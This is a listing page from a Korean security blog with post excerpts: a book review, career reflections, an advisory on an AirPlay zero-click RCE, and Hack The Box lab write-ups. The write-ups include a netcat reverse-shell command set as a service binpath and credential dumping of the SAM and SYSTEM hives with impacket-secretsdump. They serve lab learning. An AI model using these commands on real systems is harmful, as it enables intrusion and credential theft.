[책] 퍼스널 MBA
·
🤖정보보안/💠1분지식
Simon Squibb의 What is your dream을 읽으며 교보문고를 어슬렁 거리던 때 눈에 들어온 책이 있다 바로 Personal MBA라는 책이다. 해당 책에는 MBA라고하는 과정을 컬럼형식으로 짧게 짧게 생각 및 방법을 기술한 책이다. 출근할 때 간단히 한 컬럼씩 읽기 쉽게 되어있다. 평소에 느끼던 것을 책을 기술한 사람도 같은말을 하는 것을 보아하니 좋은 방식으로 인생을 살아가고 있다는 것을 느끼고 있다. 영어 공부도할 겸 원서를 보는 습관을 들이니 더욱 책이 보는 맛이 있다.
오펜시브 시큐리티에 대한 생각
·
🤖정보보안/❤️레드팀
요즘 일정이 바빠 개인적으로 OSCP의 여정은 진행되고 있지 않다. 우리나라 정보보호 산업구조에 따르면 법적 규제에 따라 일자리가 생기고 이를 준수하기 바쁜 형국으로 이루어져 있다. 각 회사는 정보보안 준수를 위하여 법적 요구사항을 충족할 정보보안 담당자를 채용을하며 이 정보보안 담당자가 없거나 이들의 업무를 지원하기 위해서 정보보안 전문기업에서의 컨설팅 및 SM 형식의 외주를 맡기게 된다. 이를 넘어 회사 고유의 특성을 반영한 직무 예를 들면 게임회사의 해킹 방지 또는 정보보안 전문기업에서의 악성코드 분석가 등 소수 직무들이 파생된다. 이 들은 모두 필요에 의하여 수동적으로 만들어지는 직무들이며 우리 정보보안 업계는 돈을 능동적으로 버는 것이 아닌 정부의 정책에 의하여 반자동으로 나오게 되는 직무로 보..
두번째 정보보안담당자 이야기
·
🤖정보보안/💙블루팀
첫번째 회사는 손에 꼽히는 정보보안전문기업 이글루시큐리티(현 이글루코퍼레이션)의 해외사업부 모의해킹 직무로 입사했다. 그 당시 나는 회사의 사업구조가 어떤지 모른채 해맑은 생각을 가지며 회사에 입사하게 되었다. 그 당시 일본어 및 모의해킹을 하는 포지션은 경력자 급으로 채용 예정이라고 들었는데, 나를 좋게 보신건지 졸업하고 일주일 이내 취업을 바로 하게 되었다. 만 3년의 내일채움공제 기간을 거쳐 투입된 프로젝트가 끝날 무렵, 1년마다 바뀌는 근무지에 나만의 정보보안 체계를 만들고자 하는 열망에 따라 그라비티라고 하는 외국계 글로벌 게임사 정보보안담당자로 이직을 하게 되었다. 내가 그동안 했던 것의 연장선인 기술보안담당자로 업무를 수행하게 되었다. 총 TO는 6명으로 기술담당 2명 정책담당 2명 개인정보..
살면서 하지 않을 거라 했던 일들
·
🤖정보보안/💠1분지식
학창시절- 한국사 재미도 없는데 할일이 없겠지?- 취업 시기에 다다르어 공무원 시험 가산점을 취득하기 위해 취득하였다. - 한자는 재미없어 안할래- 회사생활을 하며 일본어 최고 등급을 취득하였다. - 영업 직무는 절대 안할래- 영업 이라고 하면 상대방이 필요한 것을 탐색하고 제시할 수 있는 장점이 있으며 매 순간 업무에서든 영업적 마인드를 탑재하려고 한다. 왜냐? 이득이 너무 많기 때문이다. 상대방을 설득하고 문제를 해결할 수 있는 힘. 그리고 사업의 본질은 영업부터 시작이다. - 웹 프로그래밍은 절대 안할래 노가다 같아!- 3년간 부업으로 밥벌어 먹고있다! JSP/Servlet을 맛봐서 그랬나보다. Next.js 최고!
[정보] 애플 끝판왕 취약점 Airborne 공개(0-Click, RCE, CVE-2025-24132)
·
🤖정보보안/💙블루팀
[🚨위험내용]- Apple AirPlay의 "공중 전파" 제로클릭 RCE 공격으로 23억 5천만 대 이상의 기기가 Wi-Fi 기반 원격 하이재킹에 노출되었습니다. Mac, iPhone, CarPlay, 스피커, TV 등 공유 네트워크에서 모두 취약합니다.- 웜 공격 가능. 악용 가능. - CVE-2025-24252- 같은 네트워크에 있고 에어플레이 업데이트가 되어있지 않다면 당신 디바이스는 취약점에 노출 되어 있습니다. [🔓대응방안]- 패치(iOS/macOS 18.4 이상).- AirPlay 끄기 [맥북해킹]https://www.youtube.com/watch?v=ZmOvRLBL3Ys [스피커해킹]https://www.youtube.com/watch?v=vcs5G4JWab8 [자동차해킹]https..
[HTB] return
·
🤖정보보안/❤️레드팀
웹사이트에서 Setting 부분에 저장을 누르면 Server Address 데이터만 전송되는 것을 확인nc로 포트 리스닝하고 공격자의 IP로 대체시 비밀번호 포함한 데이터 노출 확인 후 접속 [계정의 그룹 및 권한 확인][SeBackupPrivilege]SAM 및 SYSTEM 획득하여 Administrator Hash 접속 시도 하였으나 불가[그룹속성확인]Print Operators 또는 Server Operators 그룹에 속해있어서 서비스 등록 시도리버스 쉘 업로드 및 서비스 등록 및 실행# 리버스쉘 서비스명 VSS를 생성sc.exe config VSS binpath="C:\Users\svc-printer\Documents\nc.exe -e cmd 10.10.14.29 1234"[NT AUTHORIT..
[HTB] Cicada
·
🤖정보보안/❤️레드팀
[이해하기]impacket-secretdump - 로컬환경[SAM] 로컬 사용자 계정, SID, 패스워드 해시 저장C:\Windows\System32\config\SAM[SYSTEM] - SAM의 암호화를 해제하는데 필요한 SYSKEY 존재C:\Windows\System32\config\SYSTEMSAM + SYSTEM 조합하여 해시 추출# SAM 및 SYSTEM 파일 추출> reg save hklm\sam sam> reg save hklm\system system# evil-winrm 다운로드 명령어 실행> download sam> download system# 로컬환경에서 sam 파일 및 system 파일을 조합하여 해시추출impacket-secretsdump -sam sam -system syste..
[HTB] sightless
·
🤖정보보안/❤️레드팀
리눅스 머신으로 웹서버가 있으며, 해당 서비스에는 Exploit 취약점이 있는 솔루션이 존재한다. 접속하게 되면 호스트네임으로 보아 container 환경으로 확인할 수 있다. 서비스의 데이터베이스를 공격자 호스트로 빼내어 해시 크래킹을 통하여 식별된 계정정보를 가지고 실제 호스트에 접속 시도를 하게된다.해당 호스트에는 크로미니움 브라우저는 원격으로 디버깅할 수 있도록 구성이 되어 있으며 해당 서비스 확인 시 주기적으로 특정 사이트에 로그인 하는 것을 자동화 하였다.서비스에 접속하게되면 명령어를 실행할 수 있는 기능이 있으며 chmod setuid를 통하여 권한 상승을 할 수 있다. [전제조건]- 획득한 데이터베이스의 데이터가 실제 SSH 접속정보와 일치해야 한다.- 특정 서비스에서 Exploit이 존재..